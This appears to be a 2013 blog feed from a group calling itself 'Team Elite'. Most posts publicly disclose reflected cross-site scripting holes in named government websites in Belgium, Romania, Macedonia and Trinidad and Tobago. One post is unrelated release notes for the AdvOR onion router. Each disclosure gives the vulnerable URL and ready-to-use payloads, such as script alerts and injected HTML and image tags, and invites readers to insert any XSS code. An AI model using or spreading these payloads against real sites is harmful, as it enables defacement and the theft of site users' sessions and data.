This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Gå till toppen
35.173.48.18.US.SSL

Ministry of Defence of Belgium - XSS

Vulnerable page: http://www.mil.be/def/search/index.asp

PoC:

Kod
"><h1>XSS found by Team Elite</h1>

Kod
"><img src=http://te-home.net/images/logo.png>

You can include any XSS code in search box to reproduce the bug.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av Neo den 2013-12-13 02:55 0 comments 0 likes

Ministry of Internal Affairs of Romania - XSS

Vulnerable page: http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=

PoC:

Kod
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E

Kod
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searWords parameter.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av Neo den 2013-12-11 01:12 0 comments 0 likes

Advanced Onion Router AdvOR 0.3.0.19a

Changes in 0.3.0.19a
- corrected: possible buffer overflow when setting a huge OS version string
- corrected: when changing the default OS version, a buffer that was not allocated with tor_malloc() was freed with tor_free() (thanks to anonymous for reporting this problem on sf.net)
- corrected: a generated AS path included some extra nodes that were before the selected path in the AS tree from geoip_as.h
- the program that imports AS path definitions and generates the geoip_as.h file is now included in the source code archive (as2asm)
- the AS path tree was updated with latest AS path definitions from cidr-report.org; a few errors were corrected in the AS tree import algorithm
- geoip_c.h was updated with GeoIPCountryWhois.csv released on December 5th; there are 84715 IP ranges having 114 ranges in the fake "A1" country; 110 ranges were approximated to real countries
- updated language strings: 1248

File information: AdvOR 0.3.0.19a
Postat av advor den 2013-12-10 21:47 0 comments 0 likes

The Administration for Security and Counterintelligence of Republic of Macedonia - XSS

Vulnerable page: http://www.mvr.gov.mk/DesktopDefault.aspx

PoC:

Kod
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><script>alert(String.fromCharCode(88,83,83))</script>

Kod
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av Neo den 2013-12-10 11:29 0 comments 0 likes

Government of Trinidad and Tobago - XSS

Vulnerable page: http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch

PoC:

Kod
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><h1>XSS found by Team Elite</h1>

Kod
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searchKeyword parameter.

Screenshot#1
[Screenshot#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av Neo den 2013-12-04 19:45 0 comments 0 likes